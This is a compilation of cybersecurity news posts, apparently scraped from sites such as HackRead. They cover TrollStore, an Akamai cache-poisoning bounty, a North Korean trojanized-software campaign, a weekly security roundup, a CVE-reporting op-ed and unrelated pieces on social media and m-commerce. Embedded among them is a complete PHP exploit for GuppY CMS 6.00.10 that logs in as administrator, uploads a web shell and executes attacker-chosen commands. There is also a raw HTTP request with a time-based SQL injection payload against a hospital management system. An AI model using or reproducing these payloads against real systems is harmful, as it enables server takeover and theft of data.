By Waqas
TrollStore does not work on anything above iOS 15.5, and beta 4, not on iOS 15.5, not on version 15.6, and not on iOS 16).
This is a post from HackRead.com Read the original post: New TrollStore Tool Permanently Installs Apps on Non-Jailbroken iOS Devices

TrollStore was released on 3rd September 2022 as a revolutionary new iOS tool that lets users install any application permanently on a non-jailbroken device. This is one feature that threat actors have been waiting for a long time.

With the arrival of TrollStore, iOS devices’ security is severely threatened. For your information, device jailbreaking means modifying the software to remove restrictions from the operator or manufacturers.

**Why is TrollStore a Threat?**

That’s because, due to Apple’s policies, the distribution of modded applications was almost impossible than the actual modding process. The tool impacts all iOS versions from iOS 14.0 to 15.4.1.

On GitHub, its developers explained that,

> “TrollStore is a permasigned jailed app that can permanently install any IPA you open in it. It works because of the CoreTrust bug that ONLY affects iOS 14.0 – 15.4.1 (15.5b4). NOTE: TrollStore will NEVER work on anything higher than iOS 15.5 beta 4 (No not on iOS 15.5, not on iOS 15.6, and certainly not on iOS 16.x), please stop asking!”

According to GuardSquare, combining two newly discovered vulnerabilities (CVE-2022-26766 and CVE-2021-30937), TrollStore helps an adversary obtain root privileges and sign the tool with arbitrary entitlements. Therefore, running the app with arbitrary permissions/characteristics becomes possible.

GuardSquare security researcher Jan Seredynski explained in their blog post that before the introduction of this tool, modded app users used to jailbreak their devices or use different approaches to install repackaged applications.

But, TrollStore takes away this effort and dramatically reduces the need to install modified apps as the user doesn’t need to jailbreak the device. There are serious repercussions for app developers because jailbreak detection would no longer remain a “valid stopgap to mitigate the majority of repackaging efforts,” Seredynski wrote.

Moreover, most common repackaging detection solutions wouldn’t detect the issue because of the CVE-2021-30937 vulnerability that allows an adversary to sign the app with an arbitrary BundleID or TeamID.

**How to Mitigate the Threat?**

It is essential that repacking detection solutions expand their boundaries beyond common verification tools such as TeamID and BundleID, for instance, iXGuard. They must verify additional indications of composition because TrollStore re-signs the app with a new certificate.

Furthermore, it is important to detect the actual modifications to application assets/codes. Finally, multiple security layers must ensure maximum mobile app security.

1.  New tool detects fake 4G cell phone towers
2.  New Underactor tool reveals pixelated text to expose data
3.  New tool lets teens report, remove their nude photos online
4.  Microsoft’s new tool detects & reports pedophiles from chats
5.  Cellebrite’s new tool unlocks almost any iOS or Android device

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New TrollStore Tool Permanently Installs Apps on Non-Jailbroken iOS Devices

A lesson in how to achieve maximum value for your discoveries

Emma Woollacott 04 October 2022 at 10:41 UTC  
Updated: 04 October 2022 at 10:48 UTC

A lesson in how to achieve maximum value for your discoveries

  

Two Italian security researchers have netted more than $46,000 in bounties for the discovery of an Akamai misconfiguration, despite receiving nothing from Akamai itself.

Akamai is one of the most widely used content delivery networks (CDNs) in the world, used by more than a thousand companies including Apple, Microsoft, Airbnb, and the US Department of Defense.

While hunting for bugs in a website using Akamai via bug bounty platform Whitejar, researchers Jacopo Tediosi and Francesco Mariani discovered a misconfiguration that allowed them to poison the cache with arbitrary content.

Read more of the latest bug bounty research

The vulnerability is a combination of common HTTP smuggling and hop-by-hop headers abuse techniques, the researchers said.

Special headers named ‘hop-by-hop’ are removed from proxies before forwarding requests to the next proxy or the destination.

However, specifying the header as ‘hop-by-hop’ led Akamai Edge Nodes to remove it. This caused a desynchronization with subsequent nodes, which interpreted part of the HTTP request as a separate, second new request.

This second response was queued and was subsequently sent in response to requests from other clients or users, causing a HTTP smuggling vulnerability.

“An attacker could have inserted malicious arbitrary content into any domain served by the Akamai network, affecting their major customers such as the US Department of Defense, PayPal, Airbnb, Mastercard, PlayStation, Microsoft, Apple, etc,” Tediosi told The Daily Swig.

“This means that they could alter the appearance and behaviour of those websites as they wish. They could also make users’ browsers perform unintended actions on the original sites, as if the users were doing them.”

**Fixes available**

The company has since fixed the issue by preventing the specification of the keyword within the header value, although an advisory has not yet been published.

Tediosi and Mariani contacted Akamai on March 24 and arranged to coordinate disclosure, with a silent fix deployed on April 2. Unfortunately, they were told at the start of the process that the company doesn’t offer bug bounties or other rewards.

However, while Akamai was working on the patch the pair decided to try and pursue bounties from some of the company’s customers.

“It was the only way to get our work rewarded, as Akamai didn’t have a bug bounty program. I honestly didn’t want to use this solution, but it worked anyway and allowed us to stay ethical,” says Tediosi.

“It worries me a little that difficulties like these may tempt researchers not to report vulnerabilities they find, leaving security holes around the web, or even worse, selling them in black markets.”

The pair immediately received $5,000 from Whitejar for the original research. And while a number of bug bounty platforms and organizations – including Bugcrowd, Microsoft, and Apple – were unable to replicate the vulnerability, others were happy to pay up.

The bounties included $25,200 from PayPal, $14,875 from Airbnb, $4,000 from Hyatt Hotels, $750 from Valve, $450 from Zomato, and $100 from Goldman Sachs.

Tediosi says he believes that the use of hop-by-hop headers for smuggling may affect other implementations besides Akamai and deserves further research. In addition, he suggests, it may be possible to bypass Akamai’s fix.

RECOMMENDED Browser-powered desync: A new class of HTTP request smuggling attacks

Researchers net $46k for Akamai misconfiguration vulnerability

By Waqas
With the increasing use of the internet, browser security has become an important issue. Malware, phishing, and adware…
This is a post from HackRead.com Read the original post: Meet Plexus, An AI-based Browser Security Solution from LayerX

With the increasing use of the internet, browser security has become an important issue. Malware, phishing, and adware are all dangers that can be encountered when browsing the web.

When a browser gets hacked, it can have serious consequences for users and businesses alike. Hackers can gain access to personal information, such as passwords and credit card numbers. They can also use the browser to spread malware or viruses. In some cases, hackers can even take control of the user’s computer.

To tackle the growing issue of browser security and vulnerability, Tel Aviv-based cybersecurity startup LayerX has unveiled the “Plexus” engine, a “user-first” extension-based universal browser security solution aiming at transforming any type of browser into a highly secure working environment without impacting users’ browsing experience.

The company also closed a $7.5 million Seed round with the following investors: Glilot Capital Partners, KMehin Ventures (the leading Israeli CISO syndicate), Mastercard FinSec Innovation Lab, Enel X, Int3, GuideStar, and cybersecurity angel investors.

Launched in 2021, LayerX uses AI-based, high-resolution monitoring to mitigate cybersecurity threats including those against web browsers. These include Google’s very own Chrome browser and Apple’s Safari browser, among others.

What makes Plexus a treat is LayerX’s deployment of a dual AI engine that works on both the client side and the backend, LayerX boosts enterprises’ protection against a wide range of browser-based security threats.

“Chrome and Safari aren’t the problem. Web browsers are perfectly built for productivity and security; it’s the interaction of the users over the web browsers that pose a threat to the organization,” notes Or Eshed, CEO and co-founder of LayerX.

“Our technology focuses on deep session analysis, adding that pivotal extra layer of security needed to keep browsers truly safe. Our solution fits into any organization and network, offering more security using fewer resources,” Eshed added.

Since Layer-X has opted for an extension-based approach, the security solution will be available on all popular browsers, including Chrome, Firefox, Safari, Opera, etc.

According to the former Chief Security Architect at Walmart Ira Winkler, “LayerX chose the approach that seems to make the most sense for browser security. An extension-based approach significantly reduces the technical risk of compatibility across all platforms and the complexity and cost of rollout and maintenance. It also reduces operational risks associated with third parties, diverse equipment, and countless other issues when compared to proprietary browser solutions.”

In conclusion, the “Plexus” engine can be a promising new solution to the growing issue of browser cybersecurity. With its user-first approach and extension-based design, it has the potential to make a significant impact on the way we browse the web securely.

1.  Guardio Review: Browser Extension Against Cybercrime?
2.  Brave Browser enters the dark web with Tor Onion service
3.  Download official version of Tor browser on Android devices
4.  Meet DuckDuckGo’s robust privacy-focused desktop browser
5.  How to automatically accept or disable browser cookies notice

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Meet Plexus, An AI-based Browser Security Solution from LayerX

Constantly posting content on social media can erode your privacy—and sense of self.

To be online is to be constantly exposed. While it may seem normal, it’s a level of exposure we’ve never dealt with before as human beings. We’re posting on Twitter, and people we’ve never met are responding with their thoughts and criticisms. People are looking at your latest Instagram selfie. They’re literally swiping on your face. Messages are piling up. It can sometimes feel like the whole world has its eyes on you.

Being observed by so many people appears to have significant psychological effects. There are, of course, good things about this ability to connect with others. It was crucial during the height of the pandemic when we couldn’t be close to our loved ones, for example. However, experts say there are also numerous downsides, and these may be more complex and persistent than we realize.

Studies have found that high levels of social media use are connected with an increased risk of symptoms of anxiety and depression. There appears to be substantial evidence connecting people’s mental health and their online habits. Furthermore, many psychologists believe people may be dealing with psychological effects that are pervasive but not always obvious.

“What we’re finding is people are spending way more time on screens than previously reported or than they believe they are,” says Larry Rosen, professor emeritus of psychology at California State University, Dominguez Hills. “It’s become somewhat of an epidemic.”

Rosen has been studying the psychological effects of technology since 1984, and he says he’s watched things “spiral out of control.” He says people are receiving dozens of notifications every day and that they often feel they can’t escape their online lives.

“Even when you’re not on the screens, the screens are in your head,” Rosen says.

One value of privacy is that it gives us space to operate without judgment. When we’re using social media, there are often a lot of strangers viewing our content, liking it, commenting on it, and sharing it with their own communities. Any time we post something online, thus exposing a part of who we are, we don’t fully know how we’re being received in the virtual world. Fallon Goodman, an assistant professor of psychology at George Washington University, says not knowing what kind of impression you’re making online can cause stress and anxiety.

“When you post a picture, the only real data you get are people’s likes and comments. That’s not necessarily a true indication of what the world feels about your picture or your post,” Goodman says. “Now you’ve put yourself out there—in a semi-permanent way—and you have limited information about how that was received, so you have limited information about the evaluations people are making about you.”

Anna Lembke, a professor of psychiatric and behavioral sciences at Stanford University, says we construct our identities through how we’re seen by others. Much of that identity is now formed on the internet, and that can be difficult to grapple with.

“This virtual identity is a composition of all of these online interactions that we have. It is a very vulnerable identity because it exists in cyberspace. In a weird kind of way we don’t have control over it,” Lembke says. “We’re very exposed.”

Without the ability to find out how their identity is ricocheting around the virtual world, people often feel a fight-or-flight response when they’ve been online for many hours—and even after they’ve logged off.

“It’s kind of an adapted hyper-vigilance. As soon as you send something out into the virtual world, you’re sort of sitting on pins and needles waiting for a response,” Lembke says. “That alone—that kind of expectancy—is a state of hyperarousal. How will people respond to this? When will they respond? What will they say?”

It would be one thing if only you saw any negative reactions, Lembke says, but they’re often available for everyone to see. She says this exacerbates feelings of shame and self-loathing that are already “endemic” in the modern world.

We are social creatures, and our brains evolved to form communities, communicate with each other, and work together. We have not evolved to expose ourselves to the judgment of the whole world on a daily basis. These things affect everyone differently, but it’s clear many people regularly feel overwhelmed by this exposure level.

If we’re not careful, our online lives can become a source of chronic stress that subtly seeps into everything. Everyone needs some privacy, but we often don’t provide it for ourselves and end up feeling like we’re constantly battling invisible enemies.

There are things you can do for yourself, however. You can turn off your notifications for social media apps, reduce how much time you spend on them, limit when you allow yourself to use them, and more. Goodman says it sometimes helps to keep your phone in the other room so you’re not so easily tempted to pick it up.

Lembke says we need to change how we think about social media and internet use as a society. She calls it a “collective” problem, not just an individual one.

“We need to come up with a kind of cultural etiquette around what appropriate and healthy consumption is, just like we have for other consumptive problems,” Lembke says. “We have nonsmoking areas. We don’t eat ice cream for breakfast. We have all kinds of laws around who can buy and consume alcohol, who can go into a casino. We need guardrails for these digital products, especially for minors.”

The High Cost of Living Your Life Online

By Waqas
The hacker group is called ZINC, and its primary targets are organizations in the aerospace, media, IT services, and defense sectors.
This is a post from HackRead.com Read the original post: NK Hackers Lacing Legit Software with Malware

Microsoft threat hunters discovered a new phishing campaign launched by a North Korean government-backed hacking group involving the use of weaponized open-source software. The malware is laced with extensive capabilities, including data theft, spying, network disruption, and financial gains.

**Well-known Software Used in Phishing Campaign**

In the new campaign, hackers are weaponizing famous open-source software, and their primary targets are organizations in the aerospace, media, IT services, and defense sectors.

In its report published on Thursday, Microsoft stated that the hackers are a sub-division of the notorious Lazarus hacking group called ZINC. This group has injected encrypted code in several open-source apps, including KiTTY, Sumatra PDF Reader, PuTTY, and muPDF/Subliminal Recording software installers, eventually leading to espionage malware being installed as ZetaNile.

For your information, ZINC is the same group that successfully conducted the highly destructive Sony Pictures Entertainment compromise in 2014.

**LinkedIn Abused to Lure Targets**

The researchers have referred to the attackers as highly dangerous, operational, and sophisticated nation-state actors abusing the LinkedIn networking portal to hunt for targets. The crooks use the network to connect and befriend employees of their selected organizations. Their targets are based in India, Russia, the UK, and the USA.

The campaign started in June 2022, whereby ZINC used conventional social engineering tactics to search and connect with individuals and gain their trust before switching the conversation to WhatsApp. Once this is achieved, they deliver the malicious payloads.

LinkedIn’s threat prevention and defense team confirmed detecting fake profiles created by North Korean actors impersonating recruiters working at prominent media, defense, and tech firms. They want to lure targets away from LinkedIn and move them to WhatsApp.

It is worth noting that LinkedIn is owned by Microsoft Corporation since 2016.

One of the fraudulent recruiter profiles on Linkedin used in the campaign (Image: Microsoft)

**Attach Methodology Explained**

According to a joint blog post by Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense, the trojanized KiTTY and PuTTY apps use an intelligent tactic to ensure that only selected targets are infected with malware and not others.

To achieve this, the app installers don’t execute malicious code. The malware is installed only when the apps connect to a particular IP address and use login credentials given to the targets by fake recruiters.

The threat actors also use DLL search order hijacking to load and decrypt a second-stage payload when this key 0CE1241A44557AA438F27BC6D4ACA246 is presented for command and control.

Additional malware is installed when the connection is established with the C2 server. Both apps work in the same manner. Similarly, TightVNC Viewer installs the final payload after the user selects ec2-aet-tech.w-adaamazonaws from a dropdown menu of remote hosts in the app.

Microsoft is urging the cybersecurity community to pay attention to this threat, given its extensive usage and use of legit software products. Moreover, it threatens users and organizations across multiple regions and sectors.

**More NK Hackers News**

1.  North Korean Hackers Posing as IT Workers
2.  How Bad is the North Korean Cyber Threat?
3.  NK hackers stole $1.7B from crypto exchanges
4.  Lazarus using AppleJeus MacOS malware for crypto
5.  LAZARUS Using TraderTraitor Malware to Target Blockchain

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

NK Hackers Lacing Legit Software with Malware

GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.

    # Exploit Title: GuppY 6.00.10 CMS Remote Code Execution# Date: Sep 30, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.freeguppy.org/# Software Link:https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2# Version: 6.00.10# Tested on: Linux#!/usr/bin/php<?php$username = "Admin"; //Administrator username$password = "rose1337"; //Administrator password$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\n");$target     =  $options['u'];$command    =  $options['c'];// Administrator login$cookie="cookie.txt";$url = "{$target}guppy/connect.php";$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;$curlObj = curl_init();curl_setopt($curlObj, CURLOPT_URL, $url);curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curlObj, CURLOPT_HEADER, 1);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);curl_setopt ($curlObj, CURLOPT_POST, 1);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$result = curl_exec($curlObj);// uploading shell$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";$post='------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="rep"file------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="ficup"; filename="shell.php"Content-Type: application/x-php<?php system($_GET["cmd"]); ?>------WebKitFormBoundarygA1APFcUlkIaWal4--';$headers = array(            'Content-Type: multipart/form-data;boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',            'Accept-Encoding: gzip, deflate',            'Accept-Language: en-US,en;q=0.9');curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);curl_setopt($curlObj, CURLOPT_URL, $url2);curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);curl_setopt($curlObj, CURLOPT_POST, true);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$data = curl_exec($curlObj);// Executing the shell$shell = "{$target}guppy/file/shell.php?cmd=" .$command;curl_setopt($curlObj, CURLOPT_URL, $shell);curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:application/x-www-form-urlencoded'));curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);curl_setopt($curlObj, CURLOPT_HEADER, False);curl_setopt($curlObj, CURLOPT_POST, false);$exec_shell = curl_exec($curlObj);$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);if($code != 200) {    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check thecredentials\n";}else {print("\n");print($exec_shell);}curl_close($curlObj);?>

GuppY CMS 6.00.10 Shell Upload

Plus: CIA failures allegedly got US informants killed, a former NSA worker is charged under the Espionage Act, and more.

There were global ripples in tech policy this week as VPN providers were forced to pull out of India as the country’s new data collection law takes hold, and UN countries prepare to elect a new head of the International Telecommunications Union—a key internet standards body.

After explosions and damage to the Nord Stream gas pipeline that runs between Russia and Germany, the destruction is being investigated as deliberate, and a complicated hunt is on to identify the perpetrator. And still-unidentified hackers are “hyperjacking” victims to grab data using a long-feared technique for hijacking virtualization software.

The notorious Lapsus$ hackers have been back on their hacking joyride, compromising massive companies around the world and delivering a dire but important warning about how vulnerable large institutions really are to compromise. And the end-to-end-encrypted communication protocol Matrix patched serious and concerning vulnerabilities this week.

Pornhub debuted a trial of an automated tool that pushes users searching for child sexual abuse material to seek help for their behavior. And Cloudflare rolled out a free Captcha alternative in an attempt to validate humanness online without the headache of finding bicycles in a grid or deciphering blurry text.

We’ve got advice on how to stand up to Big Tech and advocate for data privacy and users' rights in your community, plus tips on the latest iOS, Chrome, and HP updates you need to install.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

On Thursday night, Microsoft confirmed that two unpatched Exchange Server vulnerabilities are actively being exploited by cybercriminals. The vulnerabilities were discovered by a Vietnamese cybersecurity company named GTSC, which claims in a post on its website that the two zero-days have been used in attacks against its customers since early August. While the flaws only impact on-premise Exchange Servers that an attacker has authenticated access to, according to GTSC, the zero-days can be chained together to create backdoors into the vulnerable server. “The vulnerability turns out to be so critical that it allows the attacker to do RCE \[remote code execution\] on the compromised system,” the researchers said.

In a blog post, Microsoft described the first flaw as a server-side request forgery (SSRF) vulnerability, and the second as “an attack that allows remote code execution on a vulnerable server when PowerShell is accessible to the attacker.” The post also provides guidance for how on-premises Microsoft Exchange customers should mitigate the attack.

Sloppy dev-ops and CIA negligence partially enabled Iranian intelligence to identify and capture informants who risked their lives to provide the United States with information, according Reuters. The year-long investigation follows the story of six Iranian men who were jailed as part of an aggressive counterintelligence operation by Iran that began in 2009. The men were partially outed by what Reuters describes as a flawed web-based covert communications system that led to the arrest and execution of dozens of CIA informants in Iran and China. In 2018, Yahoo News reported on the system.

Because the CIA appeared to have purchased web-hosting space in bulk from the same provider, Reuters was able to enumerate hundreds of secret CIA websites meant to facilitate communications between informants around the world and their CIA handlers. The sites, which are no longer active, were devoted to topics such as beauty, fitness, and entertainment. Among them, according to Reuters, was a _Star Wars_ fan page. Two former CIA officials told the news agency that each fake website was assigned to only one spy in order to limit exposure of the entire network in case any single agent was captured.

James Olson, a former chief of CIA counterintelligence, told Reuters, “If we’re careless, if we’re reckless, and we’ve been penetrated, then shame on us.”

On Wednesday, a former National Security Agency staffer was charged with three violations of the Espionage Act for allegedly attempting to sell classified national defense information to an unnamed foreign government, according to court documents unsealed this week. In a press release about the arrest, the US Department of Justice stated that Jareh Sebastian Dalke, of Colorado Springs, Colorado, used an encrypted email to send excerpts of three classified documents to an undercover FBI agent, who he believed to be working with a foreign government. Dalke allegedly told the agent that he was in serious financial debt and, in exchange for the information, needed compensation in cryptocurrency.

The FBI arrested Dalke on Wednesday when he arrived at Union Station in downtown Denver to deliver classified documents to the undercover agent. If convicted, he could face up to life in prison or the death penalty.

On Tuesday, hackers hijacked _Fast Company_’s content management system, blasting two obscene push notifications to the publication’s Apple News followers. In response, the publication’s parent company, Mansueto Ventures, shut down Fastcompany.com and Inc.com, which it also owns. _Fast Company_ issued a statement calling the messages “vile” and “not in line with the content and ethos” of the outlet. An article the hacker apparently posted to _Fast Company_’s website claimed they got access through a password that was shared across many accounts, including an administrator.

As of yesterday, the company’s websites were still offline, instead redirecting to a statement about the hack.

Microsoft Exchange Server Has a Zero-Day Problem

By Owais Sultan
Due to its many benefits, mobile commerce has been growing quickly over the last several years. The need…
This is a post from HackRead.com Read the original post: Top 5 Mobile Commerce Trends in 2022

Due to its many benefits, mobile commerce has been growing quickly over the last several years. The need for mobile app development and mobile commerce is growing daily. Mobile commerce may provide you with many options to succeed in the internet market if you are an online vendor.

However, there are currently a number of significant m-commerce competitors on the market, so it’s important to remain up to date on these developments if you want to stay ahead of the pack.

**What Exactly is M-commerce?**

Mobile commerce is the act of buying and selling products and services using portable electronics like smartphones and tablets. Mobile devices with shopping applications, social media channels, and online browsers are used for all commercial transactions.

Ecommerce development solely pertains to smartphones and tablets, to put it more precisely. It is simpler for a user to do mobile shopping thanks to the speed, ease, and creative route of a mobile application.

Additionally, by offering customers the greatest e-commerce app development services, mobile e-commerce apps or websites allow them access. Additionally, it enables consumers to shop and explore from anywhere.

**Trends in Mcommerce That are Effective for Interacting with Mobile Users**

**Using Mobile Applications to Shop**

According to Google, over the last two years, digital innovation in the retail industry has grown quickly, with the percentage of channel-agnostic shoppers rising from 65% to 73%. Lockdown limitations implemented globally have resulted in a 20% increase in time spent within mobile applications for retail apps. Many businesses then relocated the services their applications provided.

In this technologically evolved world, mobile apps are becoming a far more major part of the channel mix for retailers, so it’s important to understand how they may help you serve your customers in new ways and expand your company. especially at a time of social distance and unpredictability.

**Cryptocurrency Payments**

In 2024, it is anticipated that the cryptocurrency market would be worth $1.40 billion. Instantaneous digital payments are simplified and extremely secure because of crypto’s enhancements to portability and interoperability with QR codes.

With the help of cryptocurrency payments, firms can easily accept numerous currencies on mobile retail applications throughout the globe in a safe, personalized wallet. When making purchases through a mobile retail app, customers use rapid, secure mobile wallets like Apple Pay or Android Pay.

**High Mobile Phone Sales Volumes**

In 2022, smartphones and mobile shopping will unquestionably rule the eCommerce industry. Not all surfing is done on mobile websites and applications. Additionally, they are making purchases on their phones. A mobile app often generates sales worth $102 on average, compared to $92 for mobile websites.

iPads and tablets may also be used to access these applications and websites. However, starting in 2019, these gadgets’ sales have been declining. Depending on the device they are using, you may select how to communicate your marketing messaging to them. 

**Simple Ordering**

Numerous major firms are already working in this area to take advantage of the growing possibility in the m-commerce market as mobile commerce gains popularity. It is essential to provide your consumers with a better user experience and a smooth checkout procedure if you want to remain ahead of the competition.

Modern consumers want simple, fast methods of buying. Every time they wish to make a purchase, forcing your consumers to manually input all of their information may cause them to exit the basket. 

Shopping cart abandonment rates on mobile websites are higher because mobile applications often provide a better checkout experience than mobile websites.

**Virtual Reality and Augmented Reality**

Online consumers may digitally “try on” or “experience” the things they are interested in purchasing with the use of augmented reality, which is an excellent use of technology.

AR dramatically changes how you browse, and as a result, many businesses today, like IKEA, Gucci, and others, heavily rely on Augmented Reality (AR) technology to provide amusement and inspiration. The integration of online and offline shopping experiences is made possible by virtual reality, which improves the buying experience for the consumer.

**Conclusion**

For the foreseeable future, mobile trends will continue to greatly impact the e-commerce sector. You must maintain a close watch on mobile commerce developments as an owner of an e-commerce shop in order to make the necessary plans.

Making a mobile app for your e-commerce website is the simplest method to stay current with new technology and the times. In 2022, customers will choose to buy in this manner.

1.  How Traffic Analysis Boosts Ecommerce Profits
2.  How Technology Can Help Your Business Succeed
3.  Top Data-Driven Methods for Improving Your Investment Decisions
4.  Development of Corporate Applications Based on Artificial Intelligence
5.  Recent Mobile Payment Trends And How They Are Shaping The Future

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Top 5 Mobile Commerce Trends in 2022

Reports to the National Vulnerability Database jumped in 2022, but we should pay just as much attention to the flaws that are not being reported to NVD, including those affecting the software supply chain.

"You can't improve what you don't measure" is an oft-cited bit of wisdom frequently attributed to the famous management consultant Peter Drucker.

It's hard to dismiss the core truth of the saying, even if — for the record — he didn't say it, according to the Drucker Institute. After all, metrics from quarterly sales to individual KPIs are the basis for compensation, promotions, and more in 21st century organizations. There is also abundant evidence — from B.F. Skinner, for one — that humans quickly tailor their behaviors to how they're measured and incentivized.

The question that goes unasked is whether the right things are being measured, or whether the measurements in question are complete enough that they don't distort the perceptions (and decisions) of those doing the measuring. Those kinds of inconvenient questions informed research sponsored by ReversingLabs, the firm I co-founded, that analyzed six months of reports to the National Vulnerability Database (NVD) maintained by the National Institute of Standards and Technology (NIST).

**2022: A Banner Year for CVEs**

Our analysis found that vulnerability reports of new Common Vulnerabilities and Exposures (CVEs) to the NVD are accelerating, with 2022 on track to be the biggest year ever for new vulnerability reports. If the current trend holds, there will be more than 24,500 reports by year's end. That would mark a 22% increase over 2021, which was also a record-breaking year.

Those numbers seem to suggest that software security is deteriorating and that more forceful interventions by the public and private sector are needed to shore up software security. But there's a lot that's missed in that quick take. In its two decades of existence, the NVD has seen inconsistent growth in the number of reported vulnerabilities and exposures. Before 2005, the annual number of vulnerabilities assigned a CVE identifier never exceeded 2,500. For more than a decade after that, disclosed issues fluctuated between 4,000 and 8,000 reports per year.

The number of new CVEs in those years reflected the limited capacity of the CVE team at the nonprofit corporation MITRE, which was charged with taking in and documenting new CVE reports. We know that, because once MITRE began inviting more organizations to report vulnerabilities as CVE Number Authorities (CNAs) in 2016, the number of vulnerabilities surged. It doubled in 2017, and each year since has surpassed the previous year's record of reported CVEs.

The message: Considering a metric like the number of new CVEs is a mostly meaningless exercise if you're trying to assess the overall state of software security. More contributing firms will result in more CVEs. Fewer contributing firms will produce a drop in CVEs. The overall trend line is meaningless — at least so long as participation in the CVE program and submissions to the NVD by software vendors are voluntary.

**Software Supply Chain Security: Unmeasured and Unimproved**

As to the question of whether the right things are being measured? Here again, the current configuration of the NVD is misleading and heavily skewed toward the "usual suspects." Linux distributions Fedora and Debian accounted for 1,123 and 958 vulnerabilities, respectively, in the first half of 2022 and rank first and third on the list of software firms affected by reported issues, our research revealed. Google, Microsoft, Oracle, and Apple accounted for more than 500 vulnerabilities each.

The NVD has far less to say about flaws in popular open source platforms that are getting attention from sophisticated cyber actors. For example, our research shows that attacks on the popular software package repositories NPM and Python Package Index (PyPI) spiked 289% in the past few years, to 1,010 in 2021 from 259 in 2018. But only 56 CVEs referencing PyPI are in the NVD. PyPi's owner, the Python Software Foundation, is not a CNA. Other popular development and CI/CD platforms like CodeCov, CircleCI, and Bamboo are likewise not CNAs.

**Uncomfortable Question: Can We Trust Code?**

What does this disconnect mean for the future of public resources like the NVD? Change, for one thing. Recent events — such as the hijacking of the popular ua-parser-js project by a cryptominer — show that even seemingly secure projects can be compromised.

The lesson from incidents like this is that software security teams need to expand their focus beyond vulnerability scanning and even source code analysis to look at what code is doing. As long as we ignore this core question — can we trust code? — we are not addressing software supply chain security.

NIST and the federal government are also slowly pushing forward to implement the White House's year-old executive order on improving the nation's cybersecurity, which requires all federal government contractors and software providers to create a software bill of materials (SBOM) that can be reviewed. Recently released practice guidelines from the NSA, CISA, and ODNI further spell out steps organizations can take to secure software supply chains.

To keep pace with these larger changes, however, the NVD also needs to evolve. At the very least, its scope should expand to consistently include software supply chain exposures. Only then will the NVD move closer to representing the full breadth of threats facing modern organizations.

With the Software Supply Chain, You Can't Secure What You Don't Measure

hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter.

Hi

I found a SQL injection vulnerability in your hospital management system.

**Page Request:-**

    POST /hospital/hms-staff.php HTTP/1.1
    Host: 192.168.0.107
    Content-Length: 43
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
    Connection: close
    
    email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
    

**The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr()method or using the SQLMAP  tool.**

**Affect URL: http://127.0.0.1/hms-staff.php****Afftect Parameter:  type****Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-****Mitigation:**

*   Performing Whitelist Input Validation
*   Use of Prepared Statements (with Parameterized Queries)

CVE-2022-33880: Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page · Issue #7 · projectworldsofficial/hospital-management-system-in-php

Tag

#apple